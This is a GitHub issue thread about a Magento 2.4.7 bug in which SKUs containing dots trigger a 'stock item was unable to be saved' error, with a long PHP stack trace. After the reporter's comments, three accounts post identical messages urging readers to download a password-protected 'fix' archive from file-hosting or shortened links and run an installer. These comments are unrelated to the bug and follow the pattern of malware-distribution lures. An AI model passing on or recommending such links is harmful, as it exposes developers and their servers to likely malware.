### ISSUE TITLE
using dot character in sku leads to error "The stock item was unable to be saved. Please try again."

### ISSUE THREAD

**Issue by medigeek** [magento/magento2#39119]
### Preconditions and environment

magento 2.4.7-p2
linux

using dot character in sku leads to error "The stock item was unable to be saved. Please try again."

example: `HP45-0.50-0-CLS`

### Steps to reproduce

use sku example: `HP45-0.50-0-CLS`
try to change any data, such as add test to product title

### Expected result

change of data successful

### Actual result

using dot character in sku leads to error "The stock item was unable to be saved. Please try again."

### Additional information

exception log

```
[2024-08-27T14:42:38.523827+00:00] main.CRITICAL: Magento\Framework\Validation\ValidationException: Validation Failed: "sku" can not contain leading or trailing spaces. in /var/www/htdocs/vendor/magento/module-inventory/Model/SourceItem/Command/Handler/SourceItemsSaveHandler.php:72
Stack trace:
#0 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Inventory\Model\SourceItem\Command\Handler\SourceItemsSaveHandler->execute()
#1 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Inventory\Model\SourceItem\Command\Handler\SourceItemsSaveHandler\Interceptor->___callParent()
#2 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Inventory\Model\SourceItem\Command\Handler\SourceItemsSaveHandler\Interceptor->Magento\Framework\Interception\{closure}()
#3 /var/www/htdocs/generated/code/Magento/Inventory/Model/SourceItem/Command/Handler/SourceItemsSaveHandler/Interceptor.php(23): Magento\Inventory\Model\SourceItem\Command\Handler\SourceItemsSaveHandler\Interceptor->___callPlugins()
#4 /var/www/htdocs/vendor/magento/module-inventory/Model/SourceItem/Command/SourceItemsSaveWithoutLegacySynchronization.php(36): Magento\Inventory\Model\SourceItem\Command\Handler\SourceItemsSaveHandler\Interceptor->execute()
#5 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Inventory\Model\SourceItem\Command\SourceItemsSaveWithoutLegacySynchronization->execute()
#6 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Inventory\Model\SourceItem\Command\SourceItemsSaveWithoutLegacySynchronization\Interceptor->___callParent()
#7 [internal function]: Magento\Inventory\Model\SourceItem\Command\SourceItemsSaveWithoutLegacySynchronization\Interceptor->Magento\Framework\Interception\{closure}()
#8 /var/www/htdocs/vendor/m2epro/magento2-extension/Plugin/AbstractPlugin.php(33): call_user_func_array()
#9 /var/www/htdocs/vendor/m2epro/magento2-extension/Plugin/MSI/Magento/Inventory/Model/SourceItem/Command/Save.php(64): Ess\M2ePro\Plugin\AbstractPlugin->execute()
#10 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Ess\M2ePro\Plugin\MSI\Magento\Inventory\Model\SourceItem\Command\Save->aroundExecute()
#11 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Inventory\Model\SourceItem\Command\SourceItemsSaveWithoutLegacySynchronization\Interceptor->Magento\Framework\Interception\{closure}()
#12 /var/www/htdocs/generated/code/Magento/Inventory/Model/SourceItem/Command/SourceItemsSaveWithoutLegacySynchronization/Interceptor.php(23): Magento\Inventory\Model\SourceItem\Command\SourceItemsSaveWithoutLegacySynchronization\Interceptor->___callPlugins()
#13 /var/www/htdocs/vendor/magento/module-inventory-catalog/Model/UpdateSourceItemBasedOnLegacyStockItem.php(89): Magento\Inventory\Model\SourceItem\Command\SourceItemsSaveWithoutLegacySynchronization\Interceptor->execute()
#14 /var/www/htdocs/vendor/magento/module-inventory-catalog/Plugin/CatalogInventory/UpdateSourceItemAtLegacyStockItemSavePlugin.php(152): Magento\InventoryCatalog\Model\UpdateSourceItemBasedOnLegacyStockItem->execute()
#15 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Magento\InventoryCatalog\Plugin\CatalogInventory\UpdateSourceItemAtLegacyStockItemSavePlugin->aroundSave()
#16 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\CatalogInventory\Model\ResourceModel\Stock\Item\Interceptor->Magento\Framework\Interception\{closure}()
#17 /var/www/htdocs/generated/code/Magento/CatalogInventory/Model/ResourceModel/Stock/Item/Interceptor.php(140): Magento\CatalogInventory\Model\ResourceModel\Stock\Item\Interceptor->___callPlugins()
#18 /var/www/htdocs/vendor/magento/module-catalog-inventory/Model/Stock/StockItemRepository.php(195): Magento\CatalogInventory\Model\ResourceModel\Stock\Item\Interceptor->save()
#19 /var/www/htdocs/vendor/magento/module-catalog-inventory/Model/StockRegistry.php(181): Magento\CatalogInventory\Model\Stock\StockItemRepository->save()
#20 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\CatalogInventory\Model\StockRegistry->updateStockItemBySku()
#21 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\CatalogInventory\Model\StockRegistry\Interceptor->___callParent()
#22 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\CatalogInventory\Model\StockRegistry\Interceptor->Magento\Framework\Interception\{closure}()
#23 /var/www/htdocs/generated/code/Magento/CatalogInventory/Model/StockRegistry/Interceptor.php(95): Magento\CatalogInventory\Model\StockRegistry\Interceptor->___callPlugins()
#24 /var/www/htdocs/vendor/magento/module-catalog-inventory/Observer/SaveInventoryDataObserver.php(125): Magento\CatalogInventory\Model\StockRegistry\Interceptor->updateStockItemBySku()
#25 /var/www/htdocs/vendor/magento/framework/Event/Invoker/InvokerDefault.php(88): Magento\CatalogInventory\Observer\SaveInventoryDataObserver->execute()
#26 /var/www/htdocs/vendor/magento/framework/Event/Invoker/InvokerDefault.php(74): Magento\Framework\Event\Invoker\InvokerDefault->_callObserverMethod()
#27 /var/www/htdocs/vendor/magento/framework/Event/Manager.php(65): Magento\Framework\Event\Invoker\InvokerDefault->dispatch()
#28 /var/www/htdocs/generated/code/Magento/Framework/Event/Manager/Proxy.php(105): Magento\Framework\Event\Manager->dispatch()
#29 /var/www/htdocs/vendor/magento/framework/Model/AbstractModel.php(846): Magento\Framework\Event\Manager\Proxy->dispatch()
#30 /var/www/htdocs/vendor/magento/module-catalog/Model/Product.php(976): Magento\Framework\Model\AbstractModel->afterSave()
#31 /var/www/htdocs/generated/code/Magento/Catalog/Model/Product/Interceptor.php(248): Magento\Catalog\Model\Product->afterSave()
#32 /var/www/htdocs/vendor/magento/framework/EntityManager/Observer/AfterEntitySave.php(34): Magento\Catalog\Model\Product\Interceptor->afterSave()
#33 /var/www/htdocs/vendor/magento/framework/Event/Invoker/InvokerDefault.php(88): Magento\Framework\EntityManager\Observer\AfterEntitySave->execute()
#34 /var/www/htdocs/vendor/magento/framework/Event/Invoker/InvokerDefault.php(74): Magento\Framework\Event\Invoker\InvokerDefault->_callObserverMethod()
#35 /var/www/htdocs/vendor/magento/framework/Event/Manager.php(65): Magento\Framework\Event\Invoker\InvokerDefault->dispatch()
#36 /var/www/htdocs/generated/code/Magento/Framework/Event/Manager/Proxy.php(105): Magento\Framework\Event\Manager->dispatch()
#37 /var/www/htdocs/vendor/magento/framework/EntityManager/EventManager.php(49): Magento\Framework\Event\Manager\Proxy->dispatch()
#38 /var/www/htdocs/vendor/magento/framework/EntityManager/Operation/Update.php(110): Magento\Framework\EntityManager\EventManager->dispatchEntityEvent()
#39 /var/www/htdocs/vendor/magento/framework/EntityManager/EntityManager.php(106): Magento\Framework\EntityManager\Operation\Update->execute()
#40 /var/www/htdocs/vendor/magento/module-catalog/Model/ResourceModel/Product.php(779): Magento\Framework\EntityManager\EntityManager->save()
#41 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Catalog\Model\ResourceModel\Product->save()
#42 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Catalog\Model\ResourceModel\Product\Interceptor->___callParent()
#43 /var/www/htdocs/vendor/magento/module-catalog-search/Model/Indexer/Fulltext/Plugin/Product.php(58): Magento\Catalog\Model\ResourceModel\Product\Interceptor->Magento\Framework\Interception\{closure}()
#44 /var/www/htdocs/vendor/magento/module-catalog-search/Model/Indexer/Fulltext/Plugin/Product.php(28): Magento\CatalogSearch\Model\Indexer\Fulltext\Plugin\Product->addCommitCallback()
#45 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Magento\CatalogSearch\Model\Indexer\Fulltext\Plugin\Product->aroundSave()
#46 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Catalog\Model\ResourceModel\Product\Interceptor->Magento\Framework\Interception\{closure}()
#47 /var/www/htdocs/generated/code/Magento/Catalog/Model/ResourceModel/Product/Interceptor.php(194): Magento\Catalog\Model\ResourceModel\Product\Interceptor->___callPlugins()
#48 /var/www/htdocs/vendor/magento/framework/Model/AbstractModel.php(663): Magento\Catalog\Model\ResourceModel\Product\Interceptor->save()
#49 /var/www/htdocs/generated/code/Magento/Catalog/Model/Product/Interceptor.php(1706): Magento\Framework\Model\AbstractModel->save()
#50 /var/www/htdocs/vendor/magento/module-catalog/Controller/Adminhtml/Product/Save.php(143): Magento\Catalog\Model\Product\Interceptor->save()
#51 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Catalog\Controller\Adminhtml\Product\Save->execute()
#52 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->___callParent()
#53 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->Magento\Framework\Interception\{closure}()
#54 /var/www/htdocs/generated/code/Magento/Catalog/Controller/Adminhtml/Product/Save/Interceptor.php(23): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->___callPlugins()
#55 /var/www/htdocs/vendor/magento/framework/App/Action/Action.php(111): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->execute()
#56 /var/www/htdocs/vendor/magento/module-backend/App/AbstractAction.php(151): Magento\Framework\App\Action\Action->dispatch()
#57 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Backend\App\AbstractAction->dispatch()
#58 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->___callParent()
#59 /var/www/htdocs/vendor/weltpixel/m2-weltpixel-backend/Plugin/Utility.php(76): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->Magento\Framework\Interception\{closure}()
#60 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): WeltPixel\Backend\Plugin\Utility->aroundDispatch()
#61 /var/www/htdocs/vendor/magento/module-backend/App/Action/Plugin/Authentication.php(145): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->Magento\Framework\Interception\{closure}()
#62 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Magento\Backend\App\Action\Plugin\Authentication->aroundDispatch()
#63 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->Magento\Framework\Interception\{closure}()
#64 /var/www/htdocs/generated/code/Magento/Catalog/Controller/Adminhtml/Product/Save/Interceptor.php(32): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->___callPlugins()
#65 /var/www/htdocs/vendor/magento/framework/App/FrontController.php(245): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->dispatch()
#66 /var/www/htdocs/vendor/magento/framework/App/FrontController.php(212): Magento\Framework\App\FrontController->getActionResponse()
#67 /var/www/htdocs/vendor/magento/framework/App/FrontController.php(146): Magento\Framework\App\FrontController->processRequest()
#68 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Framework\App\FrontController->dispatch()
#69 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Framework\App\FrontController\Interceptor->___callParent()
#70 [internal function]: Magento\Framework\App\FrontController\Interceptor->Magento\Framework\Interception\{closure}()
#71 /var/www/htdocs/vendor/m2epro/magento2-extension/Plugin/AbstractPlugin.php(33): call_user_func_array()
#72 /var/www/htdocs/vendor/m2epro/magento2-extension/Plugin/HealthStatus/Magento/Framework/App/FrontController.php(40): Ess\M2ePro\Plugin\AbstractPlugin->execute()
#73 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Ess\M2ePro\Plugin\HealthStatus\Magento\Framework\App\FrontController->aroundDispatch()
#74 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Framework\App\FrontController\Interceptor->Magento\Framework\Interception\{closure}()
#75 /var/www/htdocs/generated/code/Magento/Framework/App/FrontController/Interceptor.php(23): Magento\Framework\App\FrontController\Interceptor->___callPlugins()
#76 /var/www/htdocs/vendor/magento/framework/App/Http.php(116): Magento\Framework\App\FrontController\Interceptor->dispatch()
#77 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Framework\App\Http->launch()
#78 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Framework\App\Http\Interceptor->___callParent()
#79 /var/www/htdocs/vendor/magento/module-application-performance-monitor/Plugin/ApplicationPerformanceMonitor.php(38): Magento\Framework\App\Http\Interceptor->Magento\Framework\Interception\{closure}()
#80 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Magento\ApplicationPerformanceMonitor\Plugin\ApplicationPerformanceMonitor->aroundLaunch()
#81 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Framework\App\Http\Interceptor->Magento\Framework\Interception\{closure}()
#82 /var/www/htdocs/generated/code/Magento/Framework/App/Http/Interceptor.php(23): Magento\Framework\App\Http\Interceptor->___callPlugins()
#83 /var/www/htdocs/vendor/magento/framework/App/Bootstrap.php(264): Magento\Framework\App\Http\Interceptor->launch()
#84 /var/www/htdocs/pub/index.php(30): Magento\Framework\App\Bootstrap->run()
#85 {main}

Next Magento\Framework\Exception\CouldNotSaveException: The stock item was unable to be saved. Please try again. in /var/www/htdocs/vendor/magento/module-catalog-inventory/Model/Stock/StockItemRepository.php:198
Stack trace:
#0 /var/www/htdocs/vendor/magento/module-catalog-inventory/Model/StockRegistry.php(181): Magento\CatalogInventory\Model\Stock\StockItemRepository->save()
#1 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\CatalogInventory\Model\StockRegistry->updateStockItemBySku()
#2 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\CatalogInventory\Model\StockRegistry\Interceptor->___callParent()
#3 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\CatalogInventory\Model\StockRegistry\Interceptor->Magento\Framework\Interception\{closure}()
#4 /var/www/htdocs/generated/code/Magento/CatalogInventory/Model/StockRegistry/Interceptor.php(95): Magento\CatalogInventory\Model\StockRegistry\Interceptor->___callPlugins()
#5 /var/www/htdocs/vendor/magento/module-catalog-inventory/Observer/SaveInventoryDataObserver.php(125): Magento\CatalogInventory\Model\StockRegistry\Interceptor->updateStockItemBySku()
#6 /var/www/htdocs/vendor/magento/framework/Event/Invoker/InvokerDefault.php(88): Magento\CatalogInventory\Observer\SaveInventoryDataObserver->execute()
#7 /var/www/htdocs/vendor/magento/framework/Event/Invoker/InvokerDefault.php(74): Magento\Framework\Event\Invoker\InvokerDefault->_callObserverMethod()
#8 /var/www/htdocs/vendor/magento/framework/Event/Manager.php(65): Magento\Framework\Event\Invoker\InvokerDefault->dispatch()
#9 /var/www/htdocs/generated/code/Magento/Framework/Event/Manager/Proxy.php(105): Magento\Framework\Event\Manager->dispatch()
#10 /var/www/htdocs/vendor/magento/framework/Model/AbstractModel.php(846): Magento\Framework\Event\Manager\Proxy->dispatch()
#11 /var/www/htdocs/vendor/magento/module-catalog/Model/Product.php(976): Magento\Framework\Model\AbstractModel->afterSave()
#12 /var/www/htdocs/generated/code/Magento/Catalog/Model/Product/Interceptor.php(248): Magento\Catalog\Model\Product->afterSave()
#13 /var/www/htdocs/vendor/magento/framework/EntityManager/Observer/AfterEntitySave.php(34): Magento\Catalog\Model\Product\Interceptor->afterSave()
#14 /var/www/htdocs/vendor/magento/framework/Event/Invoker/InvokerDefault.php(88): Magento\Framework\EntityManager\Observer\AfterEntitySave->execute()
#15 /var/www/htdocs/vendor/magento/framework/Event/Invoker/InvokerDefault.php(74): Magento\Framework\Event\Invoker\InvokerDefault->_callObserverMethod()
#16 /var/www/htdocs/vendor/magento/framework/Event/Manager.php(65): Magento\Framework\Event\Invoker\InvokerDefault->dispatch()
#17 /var/www/htdocs/generated/code/Magento/Framework/Event/Manager/Proxy.php(105): Magento\Framework\Event\Manager->dispatch()
#18 /var/www/htdocs/vendor/magento/framework/EntityManager/EventManager.php(49): Magento\Framework\Event\Manager\Proxy->dispatch()
#19 /var/www/htdocs/vendor/magento/framework/EntityManager/Operation/Update.php(110): Magento\Framework\EntityManager\EventManager->dispatchEntityEvent()
#20 /var/www/htdocs/vendor/magento/framework/EntityManager/EntityManager.php(106): Magento\Framework\EntityManager\Operation\Update->execute()
#21 /var/www/htdocs/vendor/magento/module-catalog/Model/ResourceModel/Product.php(779): Magento\Framework\EntityManager\EntityManager->save()
#22 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Catalog\Model\ResourceModel\Product->save()
#23 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Catalog\Model\ResourceModel\Product\Interceptor->___callParent()
#24 /var/www/htdocs/vendor/magento/module-catalog-search/Model/Indexer/Fulltext/Plugin/Product.php(58): Magento\Catalog\Model\ResourceModel\Product\Interceptor->Magento\Framework\Interception\{closure}()
#25 /var/www/htdocs/vendor/magento/module-catalog-search/Model/Indexer/Fulltext/Plugin/Product.php(28): Magento\CatalogSearch\Model\Indexer\Fulltext\Plugin\Product->addCommitCallback()
#26 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Magento\CatalogSearch\Model\Indexer\Fulltext\Plugin\Product->aroundSave()
#27 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Catalog\Model\ResourceModel\Product\Interceptor->Magento\Framework\Interception\{closure}()
#28 /var/www/htdocs/generated/code/Magento/Catalog/Model/ResourceModel/Product/Interceptor.php(194): Magento\Catalog\Model\ResourceModel\Product\Interceptor->___callPlugins()
#29 /var/www/htdocs/vendor/magento/framework/Model/AbstractModel.php(663): Magento\Catalog\Model\ResourceModel\Product\Interceptor->save()
#30 /var/www/htdocs/generated/code/Magento/Catalog/Model/Product/Interceptor.php(1706): Magento\Framework\Model\AbstractModel->save()
#31 /var/www/htdocs/vendor/magento/module-catalog/Controller/Adminhtml/Product/Save.php(143): Magento\Catalog\Model\Product\Interceptor->save()
#32 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Catalog\Controller\Adminhtml\Product\Save->execute()
#33 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->___callParent()
#34 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->Magento\Framework\Interception\{closure}()
#35 /var/www/htdocs/generated/code/Magento/Catalog/Controller/Adminhtml/Product/Save/Interceptor.php(23): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->___callPlugins()
#36 /var/www/htdocs/vendor/magento/framework/App/Action/Action.php(111): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->execute()
#37 /var/www/htdocs/vendor/magento/module-backend/App/AbstractAction.php(151): Magento\Framework\App\Action\Action->dispatch()
#38 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Backend\App\AbstractAction->dispatch()
#39 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->___callParent()
#40 /var/www/htdocs/vendor/weltpixel/m2-weltpixel-backend/Plugin/Utility.php(76): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->Magento\Framework\Interception\{closure}()
#41 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): WeltPixel\Backend\Plugin\Utility->aroundDispatch()
#42 /var/www/htdocs/vendor/magento/module-backend/App/Action/Plugin/Authentication.php(145): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->Magento\Framework\Interception\{closure}()
#43 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Magento\Backend\App\Action\Plugin\Authentication->aroundDispatch()
#44 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->Magento\Framework\Interception\{closure}()
#45 /var/www/htdocs/generated/code/Magento/Catalog/Controller/Adminhtml/Product/Save/Interceptor.php(32): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->___callPlugins()
#46 /var/www/htdocs/vendor/magento/framework/App/FrontController.php(245): Magento\Catalog\Controller\Adminhtml\Product\Save\Interceptor->dispatch()
#47 /var/www/htdocs/vendor/magento/framework/App/FrontController.php(212): Magento\Framework\App\FrontController->getActionResponse()
#48 /var/www/htdocs/vendor/magento/framework/App/FrontController.php(146): Magento\Framework\App\FrontController->processRequest()
#49 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Framework\App\FrontController->dispatch()
#50 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Framework\App\FrontController\Interceptor->___callParent()
#51 [internal function]: Magento\Framework\App\FrontController\Interceptor->Magento\Framework\Interception\{closure}()
#52 /var/www/htdocs/vendor/m2epro/magento2-extension/Plugin/AbstractPlugin.php(33): call_user_func_array()
#53 /var/www/htdocs/vendor/m2epro/magento2-extension/Plugin/HealthStatus/Magento/Framework/App/FrontController.php(40): Ess\M2ePro\Plugin\AbstractPlugin->execute()
#54 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Ess\M2ePro\Plugin\HealthStatus\Magento\Framework\App\FrontController->aroundDispatch()
#55 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Framework\App\FrontController\Interceptor->Magento\Framework\Interception\{closure}()
#56 /var/www/htdocs/generated/code/Magento/Framework/App/FrontController/Interceptor.php(23): Magento\Framework\App\FrontController\Interceptor->___callPlugins()
#57 /var/www/htdocs/vendor/magento/framework/App/Http.php(116): Magento\Framework\App\FrontController\Interceptor->dispatch()
#58 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(58): Magento\Framework\App\Http->launch()
#59 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(138): Magento\Framework\App\Http\Interceptor->___callParent()
#60 /var/www/htdocs/vendor/magento/module-application-performance-monitor/Plugin/ApplicationPerformanceMonitor.php(38): Magento\Framework\App\Http\Interceptor->Magento\Framework\Interception\{closure}()
#61 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(135): Magento\ApplicationPerformanceMonitor\Plugin\ApplicationPerformanceMonitor->aroundLaunch()
#62 /var/www/htdocs/vendor/magento/framework/Interception/Interceptor.php(153): Magento\Framework\App\Http\Interceptor->Magento\Framework\Interception\{closure}()
#63 /var/www/htdocs/generated/code/Magento/Framework/App/Http/Interceptor.php(23): Magento\Framework\App\Http\Interceptor->___callPlugins()
#64 /var/www/htdocs/vendor/magento/framework/App/Bootstrap.php(264): Magento\Framework\App\Http\Interceptor->launch()
#65 /var/www/htdocs/pub/index.php(30): Magento\Framework\App\Bootstrap->run()
#66 {main} {"exception":"[object] (Magento\\Framework\\Exception\\CouldNotSaveException(code: 0): The stock item was unable to be saved. Please try again. at /var/www/htdocs/vendor/magento/module-catalog-inventory/Model/Stock/StockItemRepository.php:198)
[previous exception] [object] (Magento\\Framework\\Validation\\ValidationException(code: 0): Validation Failed: \"sku\" can not contain leading or trailing spaces. at /var/www/htdocs/vendor/magento/module-inventory/Model/SourceItem/Command/Handler/SourceItemsSaveHandler.php:72)"} []
```

### Triage and priority

- [ ] Severity: **S0** _- Affects critical data or functionality and leaves users without workaround._
- [ ] Severity: **S1** _- Affects critical data or functionality and forces users to employ a workaround._
- [ ] Severity: **S2** _- Affects non-critical data or functionality and forces users to employ a workaround._
- [ ] Severity: **S3** _- Affects non-critical data or functionality and does not force users to employ a workaround._
- [ ] Severity: **S4** _- Affects aesthetics, professional look and feel, “quality” or “usability”._

**Comment by medigeek** [comment]
@magento give me 2.4-develop instance

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by medigeek** [comment]
looks like an issue with plugins, can't reproduce

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
